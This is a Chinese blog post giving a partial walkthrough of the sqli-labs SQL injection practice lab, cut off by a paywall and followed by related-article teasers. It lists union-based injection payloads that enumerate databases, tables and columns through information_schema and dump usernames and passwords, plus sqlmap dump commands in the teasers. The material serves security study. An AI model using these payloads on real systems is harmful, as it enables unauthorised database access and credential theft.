SQL注入 sqli-labs部分解析

最新推荐文章于 2024-05-18 14:28:08 发布
最新推荐文章于 2024-05-18 14:28:08 发布
阅读量612 收藏 3
点赞数
文章标签: 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ziwenya/article/details/126480068
版权

一、注入分类

1、数据类型分类:数字型注入、字符型注入

2、HTTP请求方法分类:GET型注入、POST型注入

3、注入方式分类:联合注入、报错注入、布尔盲注、时间盲注、宽字节注入等

二、实践靶场搭建

phpstudy    sqli-labs

三、注入流程

判断是否存在注入漏洞→判断字段数→判断显错位→判断库名→判断表名→判断列明→寻找具体数据

order by:排序

database():数据库

limit n,m:限制输出,从n+1开始,m个

information_schema():数据库

information_schema.tables:记录表名信息的表

information_schema.columns:记录列名信息的表

table_name:表名

column_name:列名

table_schema:数据库名

四、数据类型注入流程

1、字符型注入(案例:Less-1)

  • 检测漏洞是否存在:'、' -- qwe
  • 判断字段数:order by
  • 联合查询得到输出点:union select 1,2,3
  • 查询数据库版本:union select 1,2,version()
  • 查询数据库名:union select 1,2,database()
  • 查询表名:union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()
  • 查询users表的字段名(列名):union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'
  • 查询username、password字段数据:union select 1,group_concat(username),group_concat(password) from users

案例演示:

(1)判断漏洞是否存在,以及漏洞类型。根据id传参可以判断为字符型注入

http://localhost/sqli_labs_master/Less-1/?id=1'  //页面返回错误

http://localhost/sqli_labs_master/Less-1/?id=1' -- qwe  //页面返回正常

 (2)使用order by判断字段数,尝试后判断为3

http:
最低0.47元/天 解锁文章
小西瓜゜
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 13万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sqli-labs大详解(完结)
hxhxhxhxx的博客
07-28 5万+
sqlilabs详解(不断更新)题目1-10Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)GET - Error based - Intiger based (基于错误的GET整型注入)Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)Less-4 GET - Error based - Double Quotes
sqli-labs SQL注入靶场通关手册(1-20)
最新发布
2401_83601024的博客
05-18 1902
因为我们使用单引号闭合了 passwd 参数所在的 Sql 语句的前面的部分,使用 OR 连接的 updatexml() 函数就会被执行。获取数据库名,使用 substr() 函数截取数据库名的每个字符,然后使用 ASCII() 函数判断这个字符的 ASCII 码值。获取数据库名,使用 substr() 函数截取数据库名的每个字符,然后使用 ASCII() 函数判断这个字符的 ASCII 码值。注入万能密码试试,用户名随便写点东西,使用 OR 运算符构造恒真条件,使用 “#” 注释掉后面的内容注入。
sqli-labs详解------持续更新
yuqie的博客
06-20 2730
如今已经很少使用手动注入了,写这篇的初心在于掌握并熟记手动注入,
sqli-labs训练平台靶场详解!!!!
ytdd66的博客
03-19 4434
下面选取几个具有代表性的关卡,演示几种 SQL 注入漏洞利用方法。
SQL注入sqli-labs
m0_60716947的博客
04-08 7330
目录 (一)搭建 sqli-labs 靶场 (二)sqli-labs的第一关至第四关笔记 (1)第一关 sqli-labs 是一款基于 sql 注入的游戏教程,有利于更好地了解 sql 注入的语法。 (一)搭建 sqli-labs 靶场 搭建 sqli-labs 靶场前首先要下载 phpstudy phpstudy下载链接:https://www.xp.cn 要保证安装路径中不能有空格和中文。 下载完成后: 可以对 root 数据库进行修改密码或创建数据库,然后在软件管理..
sqli-labs-master靶机
10-12
SQL注入实验室(sqli-labs)详解】 SQL注入SQL Injection)是一种常见的网络安全漏洞,攻击者通过在Web应用程序的输入字段中注入恶意SQL代码,从而获取、修改、删除数据库中的敏感信息,甚至完全控制数据库...
sqli-labs-master-注入学习靶机
01-19
`sqli-labs-master-注入学习靶机` 提供了一个模拟环境,帮助学习者深入理解SQL注入的工作原理,并提供实践机会来熟悉防御策略。 这个靶机教程由印度开发者创建,旨在帮助用户掌握SQL注入攻击的不同类型,以及如何...
sqli-lib64关闯关笔记学习资料.zip
08-22
sqli-lib64是一个专门设计的在线平台,用于帮助开发者和安全爱好者学习和实践SQL注入技术。这个关卡挑战提供了65个不同难度的级别,逐步引导用户了解和掌握SQL注入的各种类型和防御策略。 《sqli-labs-1-65閫氬叧鏁...
sqli-labs.7z
08-29
SQL注入实验室(sqli-labs):网络安全与信息安全实践》 SQL注入SQL Injection)是一种常见的网络安全漏洞,攻击者通过在输入数据中嵌入恶意的SQL语句,以获取未经授权的数据访问或对数据库进行非法操作。sqli-...
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析
Jay17的博客
08-03 3万+
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析 详细,超级详细
sqli-labs通关详解
m0_52051132的博客
10-15 6859
sqlmap.py -r ./xx.txt --batch --level 3 --tamper=“base64encode.py” --current-db 爆破表单。sqlmap.py -u ip --data=“uname=admin&passwd=admin” --batch -D security --tables 最后脱库。条件正确有回显,条件错误没有回显,布尔盲注?py -r 文件位置 -p 扫描位置 --batch -D security -T users --dump //脱库。
Sqli-labs环境搭建教程(sql注入
Victor1889的博客
01-06 9213
Sqli-labs环境搭建教程(sql注入
sqli-labs 通关笔记详解 Less1 - Less10
HAKUNAMATATATTA的博客
12-18 2766
sqli-labs靶场之前建议补一下基础。
sqli-labs靶场安装
剁椒鱼头没剁椒的博客
10-22 6915
PhpStudy国内12年老牌公益软件,集安全,高效,功能与一体,已获得全球用户认可安装,运维也高效。支持一键LAMP,LNMP,集群,监控,网站,FTP,数据库,JAVA等100多项服务器管理功能。Sqlilabs是一个学习sql注入的平台,GET和POST场景包括了许多基本的实验内容,例如:基于错误的注入、盲注、更新查询注入、插入查询注入、Header注入、二次注入、Bypass WAF、堆叠注入等等。
SQLi-Labs 安装
SunJ3t的菠萝屋
05-24 6529
1. 前言 我们在刚学习 SQL 注入的时候,往往都需要一个能 SQL 注入的网站进行 SQL 注入学习。如果直接去网上寻找存在 SQL 注入的网站对新手来说有些难度,因此我们一般都是在本地搭建一个能 SQL 注入测试的网站。 这里就来讲解一下 SQLi-Labs 的下载,安装,搭建教程。 注意: PHP 版本一定要设置成 PHP5 以上,PHP7 以下,PHP5 以上才有 information_schema 库,PHP7 之后的 mysql_ 都改成了 mysqli_** 了,所以用其他版本的 PHP
Sqli-lab教程-史上最全详解(1-22通关)
qq_52364123的博客
04-10 8738
sql注入集合

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值